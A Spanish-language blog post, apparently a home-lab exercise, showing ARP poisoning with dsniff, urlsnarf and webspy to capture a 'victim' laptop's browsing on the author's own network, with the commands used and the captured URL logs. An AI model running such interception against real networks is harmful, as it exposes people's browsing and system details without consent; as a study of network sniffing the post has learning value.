Ahora voy a activar el sniffer desde un PC sobremesa conectado directamente al router mediante un cable ethernet.
Los pasos a seguir igual que en el paso 1, activar el reenvío de paquetes y envenenar la tabla ARP.
Activo el sniffer:
#dsniff -i eth0
Desde mi laptop accedo a la pagina de www.msn.es y www.elpais.es.
La salida que me da es la que sigue:
dsniff: listening on eth1
-----------------
02/23/11 14:53:09 tcp 192.168.1.33.33161 -> web.edicioneselpais.net.80 (http)
GET /Widgets/widget_eskup.html?gra=1&gpg=1&gml=css=http%3A%2F%2Feskup.elpais.com%2FEstilos%2Fv1.x%2Fv1.0%2Feskup_portada_elpais_superior_escribir.css&p=1>a=*revueltasenelmundoarabe2011,*ultima_hora HTTP/1.1
Host: eskup.elpais.com
Deduzco que no ha pillado la pagina de msn.
Lo intento con urlsnarf (paginas que visito, www.google.es , www.hotmail.com, www.seriesyonkis.com):
192.168.1.33 - - [23/Feb/2011:15:02:58 +0100] "GET http://www.seriesyonkis.com/ HTTP/1.1" - - "-" "Opera/9.80 (X11; Linux x86_64; U; es-ES) Presto/2.7.62 Version/11.01"
192.168.1.33- - [23/Feb/2011:15:03:03 +0100] "GET http://www.seriesyonkis.com/ 192.168.1.33- - [23/Feb/2011:15:03:08 +0100] "GET http://www.seriesyonkis.com/ 192.168.1.33- - [23/Feb/2011:15:03:13 +0100] "GET http://feeds.feedburner.com/ultimoscapitulos.3.gif HTTP/1.1" - - "http://www.seriesyonkis.com/" "Opera/9.80 (X11; Linux x86_64; U; es-ES) Presto/2.7.62 Version/11.01"
192.168.1.33- - [23/Feb/2011:15:03:18 +0100] "GET http://content.yieldmanager.edgesuite.netthirdpartyinput%2
192.168.1.33- - [23/Feb/2011:15:03:23 +0100] "GET http://www.hotmail.com/ HTTP/1.1" - - "-" "Opera/9.80 (X11; Linux x86_64; U; es-ES) Presto/2.7.62 Version/11.01"
192.168.1.33- - [23/Feb/2011:15:03:28 +0100] "GET http://www.hotmail.com/ HTTP/1.1" - - "-" "Opera/9.80 (X11; Linux x86_64; U; es-ES) Presto/2.7.62 Version/11.01"
192.168.1.33- - [23/Feb/2011:15:03:33 +0100] "GET http://mail.live.com/default.aspx?wa=wsignin1.0 HTTP/1.1"
192.168.1.33- - [23/Feb/2011:15:03:38 +0100] "GET http://sn141w.snt141.mail.live.com/default.aspx
192.168.1.33- - [23/Feb/2011:15:03:43 +0100] "GET http://sn141w.snt141.mail.live.com
192.168.1.33- - [23/Feb/2011:15:03:48 +0100] "GET http://db2.stb01.s-msn.com/ 192.168.1.33- - [23/Feb/2011:15:05:02 +0100] "GET http://www.seriesyonkis.com/ 192.168.1.33- - [23/Feb/2011:15:05:07 +0100] "GET http://adserving.cpxinteractive.com/st?
Como se puede ver en este caso si ha pillado la pagina de msn, (el log que vemos es un resumen, únicamente dejo lo subrayado, como ejemplo, la primera linea para que veamos el formato del log ya que es muy extenso).
Ahora vamos a intentarlo con webspy. (antes quiero recordar que he deshabilitado el firewall y permitido el reenvío de paquetes ya que el equipo "víctima" es un laptop con linux)
Webspy es un sniffer con el cual podemos ver en tiempo real los sitios que esta viendo la víctima en tiempo real.
Primero activarlo:
sudo webspy -i eth1 192.168.1.33
El log que muestra es el siguiente:
openURL(http://193.110.128.199/)
openURL(http://91.203.99.45/?host=www.elmundo.es&hdn=YMJDbuxa2zAlen6rLdZ21Q==)
openURL(http://193.110.128.199/index.html?a=HTCa400e07454f0fee8ef888ae6a67aaf9f&t=1298471453)
openURL(http://193.110.128.199/albumes/2011/02/23/votantes_internacionales_gallardon/reproductor.xml)
openURL(http://62.93.187.2/crossdomain.xml)
openURL(http://62.93.187.2/track/)
Con el firefox abierto se empiezan a abrir las mismas paginas que está viendo la victima.
Desde el Pc de la víctima he abierto con google, elpais, elmundo, youtube y facebook, en el PC del atacante se ha abierto y registrado todas las páginas salvo youtube. En caso de facebook he visto la pagina pero cuando la victima se ha logado ya no he podido ver mas, entiendo que a partir de ese paso la conexion es cifrada.
Conclusión: El sniffer ha sido capaz de interceptar el 90 % de las web visitadas por la victima sin ningún tipo de advertencia. Los usuarios y contraseñas no los ha interceptado en ningún caso. En el caso particular de www.youtube.com he podido comprobar que la ip a la que hace referencia es un ip de www.google.com por lo que entiendo que google y por ello en lugar de visualizar la pagina de youtube he podido visualizar la pagina de google.
Con este tipo de ataque he podido saber la version del sistema operativo de la victima y el explorador que ha utilizado así como su versión.
No hay comentarios:
Publicar un comentario